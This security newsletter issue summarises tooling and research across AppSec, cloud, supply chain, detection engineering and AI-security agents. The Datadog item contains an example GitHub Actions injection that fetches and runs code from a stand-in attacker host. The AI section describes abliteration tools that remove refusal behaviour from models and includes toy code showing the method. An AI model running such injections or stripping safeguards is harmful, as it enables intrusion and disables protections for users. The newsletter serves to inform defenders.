[tl;dr sec] #320 - Ramp's Security Agents, How Datadog Caught Malicious OSS Contributions, Obliterating Model Refusals
How Ramp fixed ~100 security issues in 6 days, detecting and mitigating GitHub supply chain attacks, two tools to automatically remove censorship from models
Hey there,
I hope you’ve been doing well!
👩‍💻 Brace Yourself, Conferences Cometh
I’m excited for BSidesSF and RSA but phew, things have been busy 😅
If you’re flying in to San Francisco, safe travels! And remember to periodically eat, sleep, and shower amidst all the fun conference and event activities.
Friday - tl;dr sec Community Kickoff.
Mostly filling up, but DM me and I’ll try to get you in.
Saturday - I’m joining my friends on an Absolute AppSec panel, and will be at BSidesSF both days!
Wednesday - Coding Agents Unleashed hosted by TL;DR Sec & Unsupervised Learning - There’s going to be some 🔥 lightning talks from smart folks. Broader Decibel registration link here.
Semgrep is also having a ton of events. If you need a break from the RSA craziness you can stop by the office, get some coffee, snacks, or lunch, and chat with some Semgrep folks if you want.
If you find me I’ll have some tl;dr sec t-shirts and brand new stickers…

Hard to tell from the photo but it’s holographic
Sponsor
📣 Cybercrime Just Hit Escape Velocity
(Here’s the Evidence)
Flashpoint just released its 2026 Global Threat Intelligence Report, and the data is shocking.
AI-related illicit activity surged 1,500% in a single month
3.3B compromised credentials are now fueling identity-based attacks
Ransomware incidents increased 53% as groups pivot toward pure-play extortion
The report also explores how threat actors are moving from generative tools to agentic AI frameworks that can automate attacks at scale.
👉 View the Report 👈
AI is definitely helping threat actors in a number of ways, I’m curious to see more 👀 Agent-led end-to-end attacks and automated exploitation sound very interesting.
AppSec
Quicklinks
Applying Security Engineering to Make Phishing Harder - Lessons learned by Doyensec from testing a “Communication Platform as a Service.”
Corridor Raises $25M Series A to Secure AI Coding at the Source - Corridor is tackling a problem many Security and Engineering Teams are starting to feel big time - code being generated faster than traditional AppSec can secure it. Corridor’s approach embeds security directly into AI coding workflows. Backed by some of the smartest investors in AI and AppSec. tl;dr sec readers get 3 months free!*
Corridor has been able to pull some security OGs, like Alex Stamos and Joel Wallenstrom. I’m excited to see what they’re building 🤘
Martino Spagnuolo - The Forgotten Bug: How a Node.js Core Design Flaw Enables HTTP Request Splitting
*Sponsored
Introducing Swagger Jacker: Auditing OpenAPI Definition Files
Bishop Fox’s Tony West announces Swagger Jacker, a command line tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files. It parses the definition file for paths, parameters, and accepted methods and passes the results to one of five subcommands: automate (sends requests and analyzes response status codes), prepare (generates curl/sqlmap command templates for manual testing), endpoints (lists raw API routes), brute (discovers hidden definition files using 2173+ common paths), and convert (converts v2 to v3 definitions).
mitmproxy for fun and profit: Interception and Analysis of Application
Guide by Synacktiv's Corentin Liaud on using mitmproxy for network traffic interception across Linux, Android, and iOS, including three examples: redirecting git clone requests to download a different repository by modifying HTTP paths, spoofing Android geolocation by parsing and altering gRPC/protobuf coordinates sent to Google's geomobileservices API, and passively capturing Mumble VoIP chat messages by running mitmproxy in reverse TLS mode with custom protobuf parsing scripts.
The post describes setting up your test environment (using Linux network namespaces, lnxrouter for WiFi AP creation, and nftables for transparent traffic redirection), using Magisk's Cert-Fixer module to install system certificates on Android, and includes Python scripts showing how to parse and modify protocol buffers in transit.
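The first example’s path rewrite boils down to a small addon hook. A minimal sketch of that logic (the repo paths are made up, and the mitmproxy wiring is shown in comments rather than asserted as the post’s exact code):

```python
def rewrite_path(path: str, original: str, replacement: str) -> str:
    """Swap one repo prefix for another in a git smart-HTTP request path,
    e.g. GET /victim/tool.git/info/refs?service=git-upload-pack."""
    if path.startswith(original):
        return replacement + path[len(original):]
    return path

# Inside a mitmproxy addon (run with: mitmdump -s addon.py), this would be
# called from the request hook:
#   from mitmproxy import http
#
#   def request(flow: http.HTTPFlow) -> None:
#       flow.request.path = rewrite_path(
#           flow.request.path, "/victim/tool.git", "/attacker/tool.git")
```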
Sponsor
📣 Your SOC is a queueing system.
The math matters more than you think.
If you've ever looked at utilization curves, you know what happens when a queue runs hot: wait time doesn't scale linearly. It spikes. In a SOC, that means alerts aging out before anyone touches them.
"The Queue is the Breach" ebook from Prophet Security applies operational math to SOC performance: alert cycle time, wait time by severity, and what analyst utilization actually implies about your team's capacity. It's a framework for diagnosing whether your bottleneck is people, tooling, or the operating model.
Written by Jon Hencinski, Head of Security Operations at Prophet.
Nice, I like when people take a data-driven approach to security 👍️
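The non-linear wait-time claim is standard queueing theory. As a toy illustration (a simple M/M/1 model with made-up numbers, not figures from the ebook), mean time in system is W = 1/(μ − λ), which explodes as utilization approaches 1:

```python
def mean_time_in_system(lam: float, mu: float) -> float:
    """M/M/1 queue: W = 1 / (mu - lam), with arrival rate lam and
    service rate mu. Valid only while utilization lam/mu < 1."""
    if lam >= mu:
        raise ValueError("utilization >= 1: the queue grows without bound")
    return 1.0 / (mu - lam)

mu = 10.0  # alerts an analyst can close per hour (made up)
for rho in (0.5, 0.9, 0.99):
    w_minutes = mean_time_in_system(rho * mu, mu) * 60
    print(f"utilization {rho:.0%}: ~{w_minutes:.0f} min per alert")
# 50% -> 12 min, 90% -> 60 min, 99% -> 600 min: a spike, not a line.
```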
Cloud Security
Twenty Years of Cloud Security Research
Cloud historian, scholar, and man of the people Scott Piper traces 20 years of cloud security evolution through three distinct eras: the Foundational era (2006-2016) when AWS built core security features like IAM (2011), CloudTrail (2013), and Organizations (2016); the CSPM era (2016-2021) marked by open-source tools like Scout2, Cloud Custodian, Prowler, CloudMapper, Pacu, and StreamAlert; and the CNAPP era (2021-2025) with new cloud security vendors and researchers discovering cross-tenant vulnerabilities like ChaosDB and OMIGOD. The emerging AI era (2025+) is fundamentally changing both offense and defense, with AI creating exploits for CVE-2025-32433 and mongobleed in minutes, winning HackerOne's top bounty spot, and solving CTF challenges instantly.
💡 Great overview of relevant research and tools, and nice perspective on how cloud security has been evolving over time.
Bucketsquatting is (Finally) Dead
Ian McKay describes AWS's new S3 bucket namespace protection that prevents bucketsquatting attacks by requiring buckets to follow the format <prefix>-<accountid>-<region>-an, ensuring only the owning account can create buckets matching that pattern. AWS recommends this namespace be used by default for all new buckets and provides a new condition key s3:x-amz-bucket-namespace that security administrators can enforce via SCP policies across their organization.
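Enforcement via SCP might look something like the sketch below. This is a hypothetical policy shape: the Null-condition pattern is a common way to require a key be present, but check AWS’s documentation for the exact values s3:x-amz-bucket-namespace takes.

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyUnNamespacedBucketCreation",
      "Effect": "Deny",
      "Action": "s3:CreateBucket",
      "Resource": "*",
      "Condition": {
        "Null": { "s3:x-amz-bucket-namespace": "true" }
      }
    }
  ]
}
```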
Google Cloud Storage addresses this differently through domain name verification for bucket names, while Azure Blob Storage remains vulnerable due to its configurable account/container name structure and 24-character limit on storage account names.
See AWS Finally Gave S3 Buckets Their Own Rooms for more context on the issue and an overview of relevant prior research by Aqua.
Supply Chain
Building Bridges, Breaking Pipelines: Introducing Trajan
Praetorian's AJ Hammond, Carter Ross, Evan Leleux et al. announce Trajan, an open-source CI/CD security tool from Praetorian that unifies vulnerability detection and attack validation across GitHub Actions, GitLab CI, Azure DevOps, and Jenkins in a single cross-platform engine. It ships with 32 detection plugins and 24 attack plugins covering poisoned pipeline execution, secrets exposure, self-hosted runner risks, and AI/LLM pipeline vulnerabilities.
When an AI agent came knocking: Catching malicious contributions in Datadog’s open source repos
Datadog’s Christoph Hamsen, Christophe Tafani-Dereeper, and Kylian Serrania describe how their LLM-powered code review system BewAIre detected and helped mitigate attacks from hackerbot-claw, an AI agent that attempted to exploit GitHub Actions workflows across their open source repositories. The attacker successfully achieved code execution in one workflow via command injection in filenames, but defense-in-depth controls (organization-wide GitHub rulesets preventing direct pushes to main branches, restricted GITHUB_TOKEN permissions, and no sensitive secrets exposure) limited impact to only pushing a harmless commit to a non-protected branch.
💡 Nice walkthrough of noticing your open source repos are being targeted → investigating potential impact, and solid advice on hardening open source repos/GitHub Actions. Also, I really like the bullets towards the top on Datadog’s SDLC Security team initiatives re: adapting octo-sts, removing GitHub Action secrets at scale, enforcing CI security best practices, and building golden paths.
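The command-injection-in-filenames issue is the classic GitHub Actions expression-injection bug class. A hypothetical vulnerable step (not Datadog’s actual workflow), plus the standard environment-variable mitigation:

```yaml
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - id: changed
        run: echo "files=$(git diff --name-only HEAD~1)" >> "$GITHUB_OUTPUT"
      # VULNERABLE: ${{ }} expressions are expanded before the shell runs,
      # so a file named '$(curl attacker.example | sh)' in a PR executes
      # attacker-controlled code.
      - run: ls ${{ steps.changed.outputs.files }}
      # Safer: pass untrusted data through an environment variable and quote it.
      - run: ls "$FILES"
        env:
          FILES: ${{ steps.changed.outputs.files }}
```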
Blue Team
elastic/agent-skills
Elastic’s official Skills repo, covering cloud, Elasticsearch, Kibana, observability, and security. Currently includes 4 security Skills for: triaging alerts, case management (managing SOC cases via Kibana Cases when tracking incidents), detection rule management (create, tune, and manage Elastic Security detection rules), and generating sample security data (security events, attack scenarios, and synthetic alerts).
Building a Cloud-Native Detection Engineering Lab with Terraform and AWS
Rafael Martinez describes building a fully automated detection engineering lab (GitHub) in AWS using Terraform to overcome local hardware limitations, deploying three EC2 instances: Kali Linux (attacker), Windows Server with Sysmon and Winlogbeat (target), and Ubuntu running Elasticsearch and Kibana (SIEM). Easy to spin up and down as needed.
Pattern Detection and Correlation in JSON Logs
Mostafa Moradian announces RSigma, a Rust-based command-line tool that evaluates Sigma detection rules against JSON logs without requiring a SIEM. “Think of RSigma as jq for threat detection: you point it at a set of Sigma detection rules and a stream of JSON events, and it tells you what matched, with no ingestion pipeline, no database, no infrastructure.”
RSigma parses YAML rules into a strongly-typed AST, compiles them into optimized matchers, and evaluates them directly against JSON log events in real-time. The toolkit includes rsigma-parser for parsing, rsigma-eval for compilation and evaluation with stateful correlation logic and compressed event storage, a CLI for parsing, validating, linting, and evaluating rules, and rsigma-lsp for IDE support.
💡 Accurately evaluating the full spectrum of what Sigma rules can express is quite complex; it’s pretty neat to read about how RSigma handles all of these conditional expressions, correlating across rules, etc.
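For intuition, here’s a toy matcher (nowhere near RSigma’s AST/compilation pipeline): a Sigma selection is essentially an AND across fields, with a list of expected values acting as an OR:

```python
import json

def matches(selection: dict, event: dict) -> bool:
    """AND across fields; a list of expected values is an OR."""
    for field, expected in selection.items():
        value = event.get(field)
        if isinstance(expected, list):
            if value not in expected:
                return False
        elif value != expected:
            return False
    return True

# Sysmon-style process creation event vs. a Sigma-like selection.
selection = {"EventID": 1, "Image": ["C:\\Windows\\System32\\cmd.exe",
                                     "C:\\Windows\\System32\\powershell.exe"]}
event = json.loads('{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\cmd.exe"}')
print(matches(selection, event))  # True
```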
Red Team
nikaiw/VMkatz
Extract Windows credentials directly from VM memory snapshots and virtual disks. A single static 2.5MB binary that can pull NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, and NTDS.dit, with no need to exfiltrate a massive VM file.
Solving the Vendor Dependency Problem in RE
Many enterprise applications ship with hundreds to thousands of vendor dependencies, which makes it annoying to locate and analyze the proprietary source code of the application. You drown in vendor code, not the exposed attack surface. Assetnote’s Patrik Grobshäuser announces the release of Hyoketsu, an open-source tool that automatically filters vendor dependencies from Java JARs and .NET DLLs during reverse engineering by using Microsoft runtime detection (via PE header public key tokens), hash matching, and filename matching against a 13.3 GB pre-built SQLite database containing 12M+ DLLs and 14M+ JARs.
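The hash-matching leg is conceptually simple. A toy sketch (not Hyoketsu’s code or database schema): hash each artifact and look it up in the precomputed corpus of known vendor files:

```python
import hashlib

# Made-up stand-in for the 13.3 GB SQLite corpus of known vendor artifacts.
KNOWN_VENDOR_HASHES = {
    hashlib.sha256(b"bytes of some vendor .jar").hexdigest(),
}

def is_vendor(file_bytes: bytes) -> bool:
    """True if this artifact matches a known vendor hash: skip it during RE."""
    return hashlib.sha256(file_bytes).hexdigest() in KNOWN_VENDOR_HASHES

print(is_vendor(b"bytes of some vendor .jar"))  # True  -> filter out of scope
print(is_vendor(b"proprietary app code"))       # False -> keep for analysis
```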
AI + Security
p-e-w/heretic
By Philipp Emanuel Weidmann: Fully automatic censorship removal for language models. Heretic removes censorship (aka “safety alignment”) from transformer-based language models without expensive post-training, using an advanced implementation of directional ablation, also known as “abliteration.” This approach creates a decensored model that retains as much of the original model's intelligence as possible.
elder-plinius/OBLITERATUS
By Pliny the Liberator: An open-source toolkit for removing refusal behaviors from LLMs via abliteration (surgically identifying and projecting out internal refusal representations without retraining). Every obliteration run with telemetry enabled contributes anonymous benchmark data to a crowd-sourced research dataset measuring refusal direction universality across 116+ models and 5 compute tiers.
Blog overview: OBLITERATUS Strips AI Safety From Open Models in Minutes, and pretty detailed Hugging Face guest post by Maxime Labonne on abliteration here, including code on Google Colab and in an LLM course on GitHub.
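The core trick, per Labonne’s abliteration write-up, is estimating a “refusal direction” in activation space and orthogonalizing weights against it. A toy numpy sketch with random stand-in matrices, not a real model:

```python
import numpy as np

rng = np.random.default_rng(0)
d = 8  # toy hidden size

# The mean-activation difference between "harmful" and "harmless" prompts
# approximates the refusal direction r.
harmful = rng.normal(size=(32, d)) + np.array([3.0] + [0.0] * (d - 1))
harmless = rng.normal(size=(32, d))
r = harmful.mean(axis=0) - harmless.mean(axis=0)
r /= np.linalg.norm(r)  # unit vector

# Orthogonalize a weight matrix against r: W' = (I - r r^T) W, so the
# layer can no longer write anything along the refusal direction.
W = rng.normal(size=(d, d))
W_abl = W - np.outer(r, r) @ W

print(np.linalg.norm(r @ W_abl))  # ~0: the r-component of every output is gone
```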
💡 As open source models become better and better, not sure how I feel about removing “don’t cause harm” alignment training 😅
Why Codex Security Doesn’t Include a SAST Report
OpenAI describes why Codex Security doesn’t start by triaging SAST results, instead starting with understanding the repository’s architecture and trust boundaries: they don’t want to overly influence where Codex looks; not all bugs are dataflow problems; and sometimes code appears to enforce a security check but doesn’t actually guarantee the property the system relies on.
When Codex Security encounters a boundary that looks like “validation” or “sanitization,” it tries to bypass it:
Reading the relevant code path with full repository context, looking for mismatches between intent and implementation.
Pulling out security-relevant code slices and writing micro-fuzzers for them.
Giving the model access to a Python environment with z3-solver for solving complicated input constraint problems.
Executing hypotheses in a sandboxed validation environment to prove exploitability.
💡 The post is overall a good discussion of the space and outlines challenges for security scanners. I especially liked though the “how Codex validates” section, because it starts getting into some of Codex Security’s unique technical details.
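The “micro-fuzzer for a code slice” idea is easy to picture. Here’s a self-contained toy (the sanitizer and payloads are invented, not Codex’s output) that mutates a known-bad input and checks the property the system relies on:

```python
import random

# Hypothetical sanitizer "slice" under test: intends to strip <script> tags
# via single-pass string replacement, a classic bypassable pattern.
def sanitize(html: str) -> str:
    return html.replace("<script>", "").replace("</script>", "")

def fuzz(runs: int = 1000, seed: int = 0):
    """Splice the forbidden token into random positions of a known payload
    and check the property: no <script> tag survives sanitization."""
    rng = random.Random(seed)
    base = "<script>alert(1)</script>"
    for _ in range(runs):
        i = rng.randrange(len(base))
        candidate = base[:i] + "<script>" + base[i:]
        if "<script>" in sanitize(candidate):
            return candidate  # counterexample: the "validation" is bypassable
    return None

poc = fuzz()
print(poc is not None)  # True: removal re-forms the token, e.g. <scr<script>ipt>
```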
Securing our codebase with autonomous agents
Travis McPeak describes how Cursor built four security automation templates using Cursor Automations and a custom security MCP tool to handle securing their code at scale, as Cursor’s PR velocity has increased 5x in the past 9 months. The automations include: Agentic Security Review (blocks PRs with security issues), Vuln Hunter (scans existing code for vulnerabilities), Anybump (automatically patches dependencies using reachability analysis and opens PRs after tests pass), and Invariant Sentinel (monitors daily for drift against security/compliance properties). You can see their prompts on their marketplace pages.
Their security MCP, deployed as a serverless Lambda function, provides persistent data storage, deduplication of LLM-generated findings using Gemini Flash 2.5, and consistent Slack reporting across all agents. In the last two months, Agentic Security Review alone has run on thousands of PRs and prevented hundreds of security issues from reaching production.
💡 I like the focus on useful primitives that empower you to build security tooling on top of: “For agents to be useful for security, they need: out-of-the-box integrations for receiving webhooks, responding to GitHub pull requests, and monitoring codebase changes, and a rich agent harness and environment (cloud agents give them all the tools, skills, and observability that cloud agents have access to).”
I also wanted to call out the Invariant Sentinel, that’s very clever: what security properties about this repo should always be true? Did this most recent change violate that? I bet detecting drift like this catches some meaningful bugs.
We proactively fixed ~100 security issues in 6 days with 0 humans
Eli Block describes how Ramp Security Engineering built a custom agent pipeline that autonomously found, validated, and fixed ~100 novel security issues in 6 days. Their pipeline starts off with a coordinator agent equipped with skills for each vulnerability category (e.g. IDOR, XSS, …), which launches detector agents in parallel, whose findings are then passed to an adversarial manager agent who checks for false positives (~40% false positive reduction in their sample set of testing).
They found it was difficult to reproduce vulnerabilities with complex pre-conditions against a live Ramp deployment, so instead their validator agent takes reported findings and writes an integration test that reproduces the vulnerability and passes only once the endpoint is secure. The fixer agent can then patch the vulnerability by following test-driven development against the previously written integration test.
💡 Great write-up! Overall this agent pipeline follows a pretty standard structure (per bug class detectors → vet findings → try to reproduce / “prove” the issue → generate fix), but a few things stand out as unique and valuable insights:
Detectors include real examples of that vulnerability from Ramp’s code base. I bet this allows the detectors to be much more precise and effective.
Rather than trying to reproduce vulnerabilities in a live environment, they write integration tests that demonstrate the bug. As there are probably already test fixtures or other examples in the code the agent can borrow from, it makes sense that this method would often work in practice. This approach also has the added benefit that you now have a regression test for this bug coming back in the future.
So this leans into what models are good at (writing code) and future-proofs the bug from coming back 👍️
I’ve been thinking about this approach for a bit now so it’s gratifying to see someone do it 🙂
Misc
Tech
vercel-labs/portless - Replace port numbers with stable, named .localhost URLs for local development.
peakoss/anti-slop - A GitHub Action that detects and automatically closes low-quality and AI slop PRs.
Meta created ‘playbook’ to fend off pressure to crack down on scammers, documents show
Resist and Unsubscribe - Scott Galloway’s initiative to influence politics by voting with your wallet.
Andrej Karpathy - US Job Market Visualizer
The most important question nobody's asking about AI - Why Dwarkesh Patel is happy the Anthropic fight is happening now.
Startup's agent hacked McKinsey AI - exposing huge volumes of sensitive data - $20 in tokens and two hours to expose 46 million chat logs, 728,000 private files and proprietary RAG documentation. HN discussion.
Undercover Cop Generated An AI Teenager To Catch Pedophiles - Apparently AI has “been a boon for child abuse investigators,” as when asked for selfies they don’t need to use real images.
Related: In 2018, Microsoft volunteers worked with nonprofit Street Grace to create an AI chatbot that interacts with people who click on decoy advertisements on trafficking sites.
Misc
Ed Sheeran on Friends Keep Secrets - Quickly creating a song from scratch with Benny Blanco. Wow, super cool 😍
Kai Lentit - Shipping a button in 2026… 😂
Politics
Foreign hacker in 2023 compromised Epstein files FBI held - “The hacker expressed disgust at the presence of child abuse images on the device and left a message threatening to turn its owner over to the FBI. Bureau officials defused the situation by convincing the hacker that they actually were the FBI.” 😂
Putin can’t survive without war - The article argues that Russia's war in Ukraine has transformed the country into a "necropolis" where death has become central to its economy, culture, and social fabric. The war sustains a "deathonomics" model where provincial economies depend on recruitment bonuses and death payments (sometimes reaching $60,000). 40% of state spending now flows to military efforts. Really tough read on the impact on everyday Russians :(
Trump in November 2011: “Our president (Obama) will start a war with Iran because he has absolutely no ability to negotiate… The only way he figures he’s going to get reelected is to start a war with Iran.”
NBC - How Trump decided to strike Iran - “Before the U.S. and Israel launched their aerial assault, the CIA concluded that if the supreme leader, Ayatollah Ali Khamenei, was killed, he could be replaced by equally hard-line officials from within the regime, according to two people familiar with the matter.”
“Treasury Secretary Scott Bessent told Congress last month that the U.S. had purposely touched off an economic crisis in Iran that led to the massive street protests early this year that jarred the regime. By creating a dollar shortage in Iran, the U.S. forced Iran to print money, sparking inflation and stoking internal enmity toward the leadership, Bessent said.”
“…Trump flew to Mar-a-Lago, where he monitored the strike in the company of senior advisers, as he has done for several foreign strikes this term. He also made time Saturday to attend a political fundraising event at his seaside resort.”
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!
Cheers,
Clint
P.S. Feel free to connect with me on LinkedIn 👋